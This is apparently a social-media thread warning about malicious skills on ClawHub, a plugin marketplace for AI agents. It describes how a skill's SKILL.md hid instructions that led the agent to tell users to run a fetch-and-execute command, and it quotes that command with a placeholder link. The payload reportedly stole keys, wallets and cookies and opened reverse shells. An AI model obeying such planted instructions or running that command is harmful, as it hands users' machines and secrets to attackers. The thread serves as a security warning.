the #1 most downloaded skill on OpenClaw marketplace was MALWARE

it stole your SSH keys, crypto wallets, browser cookies, and opened a reverse shell to the attackers server

1,184 malicious skills found, one attacker uploaded 677 packages ALONE

OpenClaw has a skill marketplace called ClawHub where anyone can upload plugins

you install a skill, your AI agent gets new powers, this sounds great

the problem? ClawHub let ANYONE publish with just a 1 week old github account

attackers uploaded skills disguised as crypto trading bots, youtube summarizers, wallet trackers. the documentation looked PROFESSIONAL

but hidden in the SKILL.md file were instructions that tricked the AI into telling you to run a command

> to enable this feature please run: curl -sL malware_link | bash

that one command installed Atomic Stealer on macOS

it grabbed your browser passwords, SSH keys, Telegram sessions, crypto wallets, keychains, and every API key in your .env files

on other systems it opened a REVERSE SHELL giving the attacker full remote control of your machine

Cisco scanned the #1 ranked skill on ClawHub. it was called What Would Elon Do and had 9 security vulnerabilities, 2 CRITICAL. it silently exfiltrated data AND used prompt injection to bypass safety guidelines, downloaded THOUSANDS of times. the ranking was gamed to reach #1

this is npm supply chain attacks all over again except the package can THINK and has root access to your life